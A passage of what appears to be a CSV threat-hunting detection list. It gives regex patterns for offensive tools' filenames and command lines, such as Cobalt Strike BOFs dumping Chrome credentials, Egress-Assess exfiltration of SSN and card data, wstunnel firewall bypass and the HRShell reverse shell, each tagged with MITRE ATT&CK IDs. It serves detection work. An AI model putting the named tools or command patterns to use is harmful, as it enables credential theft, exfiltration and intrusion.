APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* chimera.py *",".{0,1000}\schimera\.py\s.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "* chimera.sh*",".{0,1000}\schimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* chimera_automation *.exe*",".{0,1000}\schimera_automation\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "* chrome logindata *",".{0,1000}\schrome\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chrome masterkey *",".{0,1000}\schrome\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chromepasswords.py*",".{0,1000}\schromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* chromium_based_browsers.py*",".{0,1000}\schromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "* chromium_history.py*",".{0,1000}\schromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* chromium_logins.py*",".{0,1000}\schromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* cics-enum.nse*",".{0,1000}\scics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cics-info.nse*",".{0,1000}\scics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cics-user-brute.nse*",".{0,1000}\scics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cics-user-enum.nse*",".{0,1000}\scics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* CIMplant.exe*",".{0,1000}\sCIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* citrix-brute-xml.nse*",".{0,1000}\scitrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-apps.nse*",".{0,1000}\scitrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-apps-xml.nse*",".{0,1000}\scitrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-servers.nse*",".{0,1000}\scitrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-servers-xml.nse*",".{0,1000}\scitrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* clamav-exec.nse*",".{0,1000}\sclamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cleantracks.ps1",".{0,1000}\scleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*",".{0,1000}\s\-client\sftp\s\-ip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Datatype\sssn\s\-Size\s.{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*",".{0,1000}\s\-client\shttp\s\-ip\s.{0,1000}\s\-Datatype\scc\s\-Size\s.{0,1000}\s\-Port\s.{0,1000}\s\-Loop\s.{0,1000}\s\-Fast\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* client --http-upgrade-path-prefix *wss*",".{0,1000}\sclient\s\-\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -client icmp -ip * -Datatype ssn -Report -Verbose*",".{0,1000}\s\-client\sicmp\s\-ip\s.{0,1000}\s\-Datatype\sssn\s\-Report\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* client -L socks5://*",".{0,1000}\sclient\s\-L\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L stdio://* ws:/*",".{0,1000}\sclient\s\-L\sstdio\:\/\/.{0,1000}\sws\:\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L tcp://* wss://*",".{0,1000}\sclient\s\-L\stcp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L 'tproxy+tcp://* -L 'tproxy+udp://*",".{0,1000}\sclient\s\-L\s\'tproxy\+tcp\:\/\/.{0,1000}\s\-L\s\'tproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L 'udp://* wss://*",".{0,1000}\sclient\s\-L\s\'udp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -R 'tcp://[::]:*",".{0,1000}\sclient\s\-R\s\'tcp\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -client smb -ip * -Datatype *c:\*.* -Verbose*",".{0,1000}\s\-client\ssmb\s\-ip\s.{0,1000}\s\-Datatype\s.{0,1000}c\:\\.{0,1000}\..{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*",".{0,1000}\s\-Client\sSMTPOutlook\s\-IP\s.{0,1000}\s\-NoPing\s\-DataType\s.{0,1000}ssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* client.py -s http*:5000 --cert /*.pem*",".{0,1000}\sclient\.py\s\-s\shttp.{0,1000}\:5000\s\-\-cert\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* clipboard.ps1*",".{0,1000}\sclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* clock-skew.nse*",".{0,1000}\sclock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Clone_Token /Process:* /Command:*",".{0,1000}\sClone_Token\s\/Process\:.{0,1000}\s\/Command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "* Clones a security group while using an identical name and member list but can inject another user as well*",".{0,1000}\sClones\sa\ssecurity\sgroup\swhile\susing\san\sidentical\sname\sand\smember\slist\sbut\scan\sinject\sanother\suser\sas\swell.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* cloud_enum.py*",".{0,1000}\scloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "* cloudsploit*",".{0,1000}\scloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "* cmedb",".{0,1000}\scmedb","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* CMLoot.ps1*",".{0,1000}\sCMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "* coap-resources.nse*",".{0,1000}\scoap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -cobalt *",".{0,1000}\s\-cobalt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* cobaltstrike*",".{0,1000}\scobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "* coerce * --dc-ip *",".{0,1000}\scoerce\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* coerce -u * -p * --listener-ip*",".{0,1000}\scoerce\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\-ip.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* CoercedPotato.cpp*",".{0,1000}\sCoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "* Coercer.py*",".{0,1000}\sCoercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* --coff-arg *",".{0,1000}\s\-\-coff\-arg\s.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "* CoffeeExecuteFunction*",".{0,1000}\sCoffeeExecuteFunction.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 